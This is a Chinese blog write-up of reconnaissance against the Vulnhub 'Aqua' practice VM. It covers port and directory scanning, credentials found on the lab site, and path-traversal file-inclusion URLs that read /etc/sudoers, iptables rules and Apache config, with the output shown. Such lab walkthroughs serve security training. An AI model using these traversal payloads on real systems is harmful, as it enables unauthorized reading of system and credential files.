靶机-Aqua

最新推荐文章于 2025-04-30 17:42:22 发布
最新推荐文章于 2025-04-30 17:42:22 发布
阅读量392 收藏 7
点赞数 12
分类专栏: 靶机 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44796547/article/details/135476075
版权
文章描述了一次针对IP地址192.168.253.132的网络渗透测试过程,使用了masscan、nmap进行端口扫描,发现了一些敏感目录和文件权限漏洞。测试者尝试了包括dirb扫描在内的方法,还揭示了Aqua用户权限以及系统信息(如Ubuntu和iptables规则)。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Aqua

查找靶机IP

masscan端口扫描

nmap深度扫描

dirb扫描

dirb大字典

主页
http://192.168.253.132/yes.html
The password to her secret diary is megumin:watashiwamegumin but I don’t know where she hid it…
她的秘密日记的密码是megumin:watashiwamegumin但我不知道她把它藏在哪里。
推断megumin:watashiwamegumin
下面两个没权限
http://192.168.253.132/css/
http://192.168.253.132/images/

http://192.168.253.132/manual/en/index.html一个网站

http://192.168.253.132/meow/一些图片

御剑扫出登录页面

页面

下面语句没意义,直接用刚才得到的用户和密码试下

进来后看url挺可疑的
尝试文件包含

发现用户
aqua
megumin

http://192.168.253.132/home.php?showcase=?page=…/…/…/…/…/…/…/…/etc/sudoers

http://192.168.253.132/home.php?showcase=…/…/…/…/…/…/…/etc/logrotate.conf

http://192.168.253.132/home.php?showcase=…/…/…/…/…/…/…/etc/iptables/rules.v4

http://192.168.253.132/home.php?showcase=…/…/…/…/…/…/…/etc/apache2/sites-enabled/000-default.conf

DocumentRoot /var/www/html #网站目录
-A INPUT -p tcp -m tcp --dport 21 -j DROP 对21端口拦截 与前面端口扫描结果一致
#modified by yunaranyancat #可以无许root运行的命令
aqua ALL=(ALL) NOPASSWD: /root/quotes
aqua ALL=(ALL) NOPASSWD: /root/esp
aqua ALL=(ALL) NOPASSWD: /usr/bin/gdb
megumin ALL=(ALL) NOPASSWD: /home/aqua/Desktop/backdoor
/var/log/wtmp { #可以判断log目录在var下
missingok
monthly
create 0664 root utmp
rotate 1
}
/var/log/btmp {
missingok
monthly
create 0660 root utmp
rotate 1
}
用WAPPanalyzer插件知道目标主机运行Ubuntu系统,所以/var/log/dpkg.log
STRIVE FOR PROGRESS,NOT FOR PERFECTION

伪协议、远程包含都未成功
access.log访问不到

信息收集结束

Vulnhub 解决虚拟机网络问题
qq_69775412的博客
11-21 219
有的时候,我们从vulnhub官网下载ovf文件导入到虚拟机后,使用扫描器扫描存活的时候发现扫不到靶机的IP,这是因为虚拟机的网卡配置有问题。我们需要进安全模式修改一些配置。
使用kali制作爆破字典
weixin_42695055的博客
01-09 3746
kali自带的crunch是一个根据用户定义的格式来创建密码字典的工具。
Vulnlab_AQUA靶机渗透笔记
mudi13的博客
09-06 2086
靶机用到kncokd技术,没有提示的情况下这个一时半会难以想到,算是个难点,通过和靶机上的文件包含漏洞结合下载knockd的配置文件得到敲门序列,才能成功开启ftp上传反弹木马,成功获取webshell还有难点,就是漏洞溢出提权方法,命令溢出漏洞的提权这个在靶机上测试困难。总之这个靶机没有提示的情况下还是很困难的,不过由于是素晴主题的靶机,多少在打靶过程中增加了趣味感不至于太枯燥。我们到达断点,运行c即可继续执行。
vulhub-素晴主题靶机aqua详细渗透流程
nwonknu16的博客
05-31 1734
主要是kncokd技术和后续的溢出漏洞有难度,没有提示的情况下不太好想到knockd,最后还是暴露了逆向的技术掌握太弱的问题。
【HTB系列】靶机LaCasaDePapel的渗透测试
大方子
08-07 3662
(因为是转发来的,若出现排版,乱码等问题就直接看有道的文档)有道分享链接地址: 文档:【HTB系列】靶机LaCasaDePapel的渗透测... 链接:http://note.youdao.com/noteshare?id=a475032917f4ec0bb32ce727d27509fd&sub=9534965F4D854085A4051A9957ADA6AD 知识点: 1. ...
Vulnhub靶机实战-Warzone 1
黑白的博客
01-10 798
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A 开启端口 21,22,5000 以匿名用户登录ftp,发现了两个文件。 note里面提示请使用jar包加密密码 反编译一下jar包,用juid
MySql以及navicat for mysql的安装
AquaVII的博客
04-25 653
在网上找了好多zip无安装包,总是很蛋疼,最终找到一个勉强算方便的,接下来介绍下mysql的安装 mysql的安装: 首先从百度云下载mysql:链接: http://pan.baidu.com/s/1kVlLBkb  密码: yrhi 下载mysql,直接解压到c盘就好,然后win+R,cmd中找到mysql路径下的bin目录,mysql.exe检查下是否安装成功 然后启动数据
扫描工具
weixin_33738982的博客
08-06 1137
首先,感谢原作者: (此文为转载的文章,现将原地址贴出如下:http://blog.youkuaiyun.com/mypc2010/article/details/77679760) https://github.com/Canbing007/wukong-agent =========================================== https://github.com/boy-hack...
机器人“跨协议对话”秘籍:EtherNet IP转PROFINET网关应用实录
bjbxkj的博客
04-29 343
由于两种协议在通信标准和数据格式上存在差异,导致机器人手臂无法与现场的终端控制器直接通信,设备之间的数据交换无法顺利进行,严重影响了生产线的整体效率。通过该网关的及时引入,我们避免了大规模设备改造带来的高昂成本和生产延误风险,显著提高了设备协作效率和生产线整体性能,获得了生产部门的一致认可。针对这一问题,我们工程师团队经过详细分析和现场测试,决定采用EtherNet/IP转PROFINET通信协议网关(倍讯BX-606-EIP)来实现快速、稳定的协议转换。接受控制器主动发送的指令及数据请求。
网络原理初识
2401_83526138的博客
04-29 361
物理层规定了网络通信中一些硬件设施(网线,光纤,WIFI)的要求。
指定的网络名不再可用0x00000040原因分析及解决方法
电脑技术分享网的博客
04-30 360
如:用户是属于修复别人共享给我的打印机(客户端)或前面两种都是的两个选项场景,勾选修复了【共享主机】更新补丁选项,则可能会出现打印机报错的情况。出现此类问题时,可再次点击重新扫描,找到其中的【共享主机】更新补丁进行还原,即可解决大部分别人共享给我的打印机常见错误修复。2、物理连接问题:如果使用的是网络打印机,确保打印机与网络的连接没有问题,比如网线连接正常,打印机的网络设置正确等。可快速扫描当前连接打印机需要的驱动,在扫描出的打印机驱动中可选择相关打印机驱动版本进行修复安装。
吴恩达强化学习复盘(11)连续状态空间|深度Q网络
wgc2k的博客
04-28 974
这是是一个能让用户在月球上着陆模拟飞行器的应用,它类似于一个被很多强化学习研究者使用的电子游戏。在这个应用中,用户的任务是在月球着陆器快速接近月球表面时,在适当的时间点燃推进器,使其安全降落在着陆台上。
局域网视频会议软件BeeWorks Meet
weixin_53855915的博客
04-29 271
视频会议是企业协作的重要工具,它可以支持日常会议、异地协作等内部沟通需求,节省时间和成本,在与合作伙伴沟通方面,视频会议能助力远程沟通、项目展示及商务谈判,提高合作效率。相比传统的公有云视频会议服务,私有化部署的视频会议系统在安全性、可控性、定制化和成本效益等方面具有显著优势,为企业内部使用提供了强大的支持。BeeWorks音视频会议系统支持多种类型的会议,如网络会议、在线培训、远程招聘等。提供全面的参会管理功能,如添加/删除参会人、控制发言、点名、举手、投票、签到等,方便会议组织者进行高效管理。
SD - WAN 跨境网络专线部署方式介绍
最新发布
seaarea_818的博客
04-30 93
以某企业为例,其在欧洲的分支机构只需将 CPE 设备接入现有的网络环境,通过简单的配置,就能快速与国内总部的网络建立安全、稳定的连接。管理员坐在总部的办公室里,通过控制器的管理界面,就能清晰地了解到欧洲分支网络的运行状态,包括每条链路的带宽使用情况、网络延迟等信息,并根据实际需求灵活调整网络策略。在部署 SD - WAN 跨境网络专线时,企业通常会在国内总部和欧洲分支机构分别部署 CPE设备,这一设备就像是连接企业网络与外部网络的智能桥梁。部署过程也较为便捷,企业无需进行大规模的网络改造工程。
网络钓鱼工具包Darcula引入AI技术 网络犯罪门槛进一步降低
FreeBuf_的博客
04-27 842
AI升级Darcula钓鱼工具,网络犯罪门槛骤降,企业防御告急!
【计算机网络】DHCP——动态配置ip地址
2303_78135757的博客
04-29 580
DHCP 的作用:自动分配 IP 地址及其他网络配置,简化网络管理。 • 工作原理:通过 Discover → Offer → Request → ACK 四步完成 IP 分配。 • 关键特性:IP 地址池、租期管理、续约机制、静态/动态分配。 • 适用场景:企业、家庭、公共场所 Wi-Fi、物联网等动态网络环境。 • 注意事项:需防范 DHCP 欺骗攻击,合理设置租期和排除地址。
【JavaEE】网络原理之初识(1.0)
mr_yuanshen的博客
04-30 451
IP地址用于标识主机网络地址。
关于TCP三次握手和四次挥手的疑点
Foreverthinker的博客
04-26 471
备注:为什么是四次挥手不是三次挥手,因为TCP连接是全双工,任何一端都是具有发送和接受功能的,如果是三次,也就是在第二次服务端回复ACK信息时,加上Fin终结发送指令,有可能服务端此时还没有数据还没有传输处理完成,需要等待传输完成后,再发送Fin终结指令,所以将三次拆成四次;并且这个时间段,防止旧连接的报文干扰新连接的收发,防止在新连接的时候误识别为需要关闭,等待旧连接的报文在网络中消失;:2MSL的等待时间确保了连接的旧数据包在网络中消失,避免新连接中出现旧连接的数据包混淆。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值